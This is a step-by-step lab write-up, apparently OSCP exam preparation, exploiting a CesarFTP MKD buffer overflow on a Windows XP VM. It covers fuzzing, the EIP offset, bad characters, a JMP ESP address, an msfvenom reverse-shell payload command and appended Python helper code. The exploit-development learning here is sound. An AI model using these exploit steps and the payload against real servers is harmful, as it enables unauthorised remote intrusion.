Thai version: I will come back and update it later when I have time.
Today I would like to review an old lesson of mine about buffer overflows before I take the OSCP exam in 2015. I hope you learn basic BOF from this post.
CesarFTP is an FTP server that is vulnerable to a BOF (buffer overflow).
1. First I downloaded the vulnerable software from the internet and installed it on WinXP (VM), and then
2. Searched for an exploit on my Kali Linux (no, I don't exploit with Metasploit; I just find the starting code and try to make it overflow).
The original Python 1906.py code is in the picture below. I have to change the "host" IP before the next step.
***Let's take a look at "buffer". That is something I have to modify later.*** But right now I begin with fuzzing to find how many characters can crash this application.
3. Control the EIP address
- Try replacing the characters after "\n" * 671 with 350 "A" characters: Cesar did not crash.
- Reduce the "A" characters to 340: Cesar crashed. Now I know the approximate space for the shellcode.
- Use /usr/share/metasploit-framework/tools/pattern_create.rb 340 and paste the pattern in place of the "A" characters, then send again. I found EIP is overwritten with the pattern value "41316141".
- Use /usr/share/metasploit-framework/tools/pattern_offset.rb 41316141 and find that the offset to the EIP register is 3.
- Modify the Python code as below
buffer = "MKD "
buffer += "\n" * 671
buffer += 'A' * 3 + 'B' * 4 + 'C' * 333   # 3 bytes before EIP, 4 bytes land in EIP, 333 bytes of payload space
buffer += "\r\n"
and send it again to prove the EIP location.
OK. EIP is overwritten with '\x42' characters. Now I know the location of EIP and that the payload size must not exceed 333 bytes.
4. Check bad chars
- Create the bad-character string and paste it into the Python code as
buffer = "MKD "
buffer += "\n" * 671
buffer += 'A' * 3 + 'B' * 4 + badchar   # badchar = every byte value 0x01..0xFF
buffer += "\r\n"
and send it to the app again. CesarFTP did not crash. Let's identify the bad chars by cutting them out one at a time; the bad characters found are
0x00, 0x0a, 0x0d
Remove all bad chars and send it again.
OK, but at the end of the exploit I found that "\xFF" is a bad char too.
5. Find a location for the payload (JMP ESP)
- Use mona (\xFF\xE4 is the opcode for JMP ESP):
!mona modules
!mona find -s "\xFF\xE4" -m user32.dll
- Or click "e" and "m" to find the library (.dll).
In this case I searched by this method and found that 0x7E455313 is a JMP ESP in USER32.dll.
I can overwrite EIP with JMP ESP.
6. Generate shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.122 LPORT=4445 -f c -a x86 --platform windows -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff'
and paste the shellcode into the Python script and fix the code as follows (I add "\x90" NOPs to make the exploit reliable):
buffer = "MKD "
buffer += "\n" * 671
buffer += 'A' * 3 + intel_order(EIP) + '\x90' * 7 + shellcode   # intel_order() from 1906.py packs the address little-endian
buffer += "\r\n"
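The three tool steps above (pattern_create/pattern_offset in step 3, the bad-char check in step 4, and intel_order in the final script), reworked as one added Python 3 example; this is my own code, not the page's 1906.py or the Metasploit scripts. pattern_create/pattern_offset are ports of the Ruby tools, badchar_string/first_mangled assume the stack contents have been copied out of the debugger, and the sample dump is constructed.

```python
import string
import struct

def pattern_create(length):
    """Port of pattern_create.rb: Upper/lower/digit triplets (Aa0Aa1...Aa9Ab0...),
    so each 4-byte window is unique within the first 20280 bytes."""
    chunks = (u + l + d for u in string.ascii_uppercase
              for l in string.ascii_lowercase for d in string.digits)
    pattern = ""
    for chunk in chunks:
        if len(pattern) >= length:
            break
        pattern += chunk
    return pattern[:length]

def pattern_offset(query, length=340):
    """Port of pattern_offset.rb. An 8-hex-digit query is the value shown in EIP,
    so it is unpacked little-endian into the 4 bytes that sat on the stack."""
    if len(query) == 8 and all(c in string.hexdigits for c in query):
        needle = struct.pack("<I", int(query, 16)).decode("latin-1")
    else:
        needle = query
    idx = pattern_create(length).find(needle)
    return None if idx == -1 else idx

def badchar_string(exclude=()):
    """All byte values 0x01-0xFF minus the ones already known to be bad:
    the `badchar` blob that goes after 'A' * 3 + 'B' * 4 in the MKD buffer."""
    return bytes(b for b in range(1, 256) if b not in exclude)

def first_mangled(sent, dumped):
    """Compare the bytes sent with the stack contents read back from the debugger;
    return the first byte value that was altered or truncated, None if all match."""
    for s, d in zip(sent, dumped):
        if s != d:
            return s
    return sent[len(dumped)] if len(dumped) < len(sent) else None

def intel_order(addr):
    """Little-endian packing of a 32-bit address (what intel_order(EIP) does)."""
    return struct.pack("<I", addr)

if __name__ == "__main__":
    print(pattern_offset("41316141"))                 # 3
    sent = badchar_string(exclude=(0x00, 0x0a, 0x0d))
    dumped = sent.replace(b"\xff", b"\x00")           # constructed dump: server mangled 0xFF
    print(hex(first_mangled(sent, dumped)))           # 0xff
    print(intel_order(0x7E455313).hex())              # 1353457e
```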